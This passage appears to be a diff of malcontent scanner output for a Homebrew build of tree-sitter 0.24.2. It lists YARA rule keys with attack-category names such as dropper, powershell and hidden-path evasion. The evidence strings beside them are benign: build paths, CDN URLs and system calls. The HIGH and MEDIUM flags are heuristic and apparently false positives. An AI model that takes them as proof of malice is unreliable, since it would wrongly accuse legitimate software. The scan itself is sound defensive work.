[readlink](https://github.com/search?q=readlink&type=code) | -| LOW | [fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) | -| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | -| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | -| LOW | [net/http/2](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http2.yara#http2) | Uses the HTTP/2 protocol | [HTTP/2](https://github.com/search?q=HTTP%2F2&type=code) | -| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code) | -| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | -| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | -| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | -| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvmsg](https://github.com/search?q=recvmsg&type=code) | -| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop](https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop)
[https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi](https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j)
[https://code.jquery.com/jquery-3.3.1.min.js](https://code.jquery.com/jquery-3.3.1.min.js)
[https://docs.rs/getrandom](https://docs.rs/getrandom)
[https://docs.rs/tree-sitter-language/](https://docs.rs/tree-sitter-language/)
[https://docs.rs/tree-sitter/](https://docs.rs/tree-sitter/)
[https://github.com/ChimeHQ/SwiftTreeSitter](https://github.com/ChimeHQ/SwiftTreeSitter)
[https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car](https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car)
[https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c](https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c)
[https://github.com/tree-sitter/tree-sitter-Failed](https://github.com/tree-sitter/tree-sitter-Failed)
[https://gitlab.com/https](https://gitlab.com/https)
[https://parser.cparser.h](https://parser.cparser.h)
[https://tree-sitter.github.io/tree-sitter.jshttps](https://tree-sitter.github.io/tree-sitter.jshttps)
[https://tree-sitter.github.io/tree-sitter.wasmhttps](https://tree-sitter.github.io/tree-sitter.wasmhttps)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png)
[https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT](https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT)
[https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j](https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j)
[https://tree-sitter.github.io/tree-sitter/creating-parsers](https://tree-sitter.github.io/tree-sitter/creating-parsers)
[https://tree-sitter.github.io/tree-sitter/playground](https://tree-sitter.github.io/tree-sitter/playground)
[https://tree-sitter.github.io/tree-sitter/syntax-highlighting](https://tree-sitter.github.io/tree-sitter/syntax-highlighting)
[https://tree-sitter.github.io/tree-sitter/using-parsers](https://tree-sitter.github.io/tree-sitter/using-parsers) | -| LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [stdout.write(output)](https://github.com/search?q=stdout.write%28output%29&type=code) | -| LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd -u env -i](https://github.com/search?q=cd+-u++env+-i&type=code) | -| LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | -| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | -| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | -| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|--------|-----------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| HIGH | [exec/shell/tmp_semicolon](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/tmp_semicolon.yara#semicolon_short_tmp) | unusual one-liners involving /tmp | [--;/tmp/rust-20241004-6494-uljaw4/rustc-1](https://github.com/search?q=--%3B%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1&type=code) | +| MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References 'dropper' | [Dropper](https://github.com/search?q=Dropper&type=code) | +| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | +| MEDIUM | [discover/process/runtime_deps](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/runtime_deps.yara#tls_get_addr) | [looks up thread private variables, may be used for loaded library discovery](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/clap/issues/home/linuxbrew/.cache](https://github.com/search?q=%2Fclap%2Fissues%2Fhome%2Flinuxbrew%2F.cache&type=code)
[/debug/.J](https://github.com/search?q=%2Fdebug%2F.J&type=code)
[/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | +| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | +| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) | +| MEDIUM | [exec/shell/power](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/powershell.yara#powershell) | powershell | [powershell](https://github.com/search?q=powershell&type=code) | +| MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.cache/Homebrew/cargo_cache/registry/src/index.crates.](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.cache%2FHomebrew%2Fcargo_cache%2Fregistry%2Fsrc%2Findex.crates.&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/tree-sitter/0.24.2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Ftree-sitter%2F0.24.2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code) | +| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/col](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fcol&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/raw](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fraw&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/str](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fstr&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/syn](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fsyn&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/vec](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fvec&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/cell](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fcell&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/esca](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fesca&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/io/b](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fio%2Fb&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/num/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fnum%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/ops/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fops%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/slic](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fslic&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/str/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fstr%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/time](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Ftime&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/mo](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fmo&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/st](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fst&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/os/fd](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fos%2Ffd&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sync/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsync%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/p](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fp&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/threa](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fthrea&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/addr2line-0.22](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Faddr2line-0.22&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/gimli-0.29.0/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fgimli-0.29.0%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/hashbrown-0.14](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fhashbrown-0.14&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/miniz_oxide-0.](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fminiz_oxide-0.&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/rustc-demangle](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Frustc-demangle&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/config/s](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fconfig%2Fs&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/generate](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fgenerate&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/src/high](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fsrc%2Fhigh&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/highlight/sr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fhighlight%2Fsr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/binding_](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fbinding_&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/././](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2F.%2F&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./ge](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fge&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./la](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fla&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./pa](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fpa&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./qu](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fqu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./st](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fst&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./su](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fsu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./tr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Ftr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/tags/src/lib](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Ftags%2Fsrc%2Flib&type=code) | +| MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | +| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [Content-Type](https://github.com/search?q=Content-Type&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | +| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | +| LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSON.stringify](https://github.com/search?q=JSON.stringify&type=code) | +| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | +| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [exec/dylib/iterate](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/iterate.yara#dl_iterate_phdr) | [iterate over list of shared objects](https://man7.org/linux/man-pages/man3/dl_iterate_phdr.3.html) | [dl_iterate_phdr](https://github.com/search?q=dl_iterate_phdr&type=code) | +| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | +| LOW | [exec/shell/SHELL](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/SHELL.yara#SHELL) | [path to active shell](https://man.openbsd.org/login.1#ENVIRONMENT) | [SHELL](https://github.com/search?q=SHELL&type=code) | +| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | +| LOW | [fs/directory/list](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-list.yara#GoReadDir) | Uses Go functions to list a directory | [.ReadDir](https://github.com/search?q=.ReadDir&type=code) | +| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) | +| LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | +| LOW | [fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) | +| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | +| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | +| LOW | [net/http/2](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http2.yara#http2) | Uses the HTTP/2 protocol | [HTTP/2](https://github.com/search?q=HTTP%2F2&type=code) | +| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code) | +| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | +| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | +| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | +| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvmsg](https://github.com/search?q=recvmsg&type=code) | +| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop](https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop)
[https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi](https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j)
[https://code.jquery.com/jquery-3.3.1.min.js](https://code.jquery.com/jquery-3.3.1.min.js)
[https://docs.rs/getrandom](https://docs.rs/getrandom)
[https://docs.rs/tree-sitter-language/](https://docs.rs/tree-sitter-language/)
[https://docs.rs/tree-sitter/](https://docs.rs/tree-sitter/)
[https://github.com/ChimeHQ/SwiftTreeSitter](https://github.com/ChimeHQ/SwiftTreeSitter)
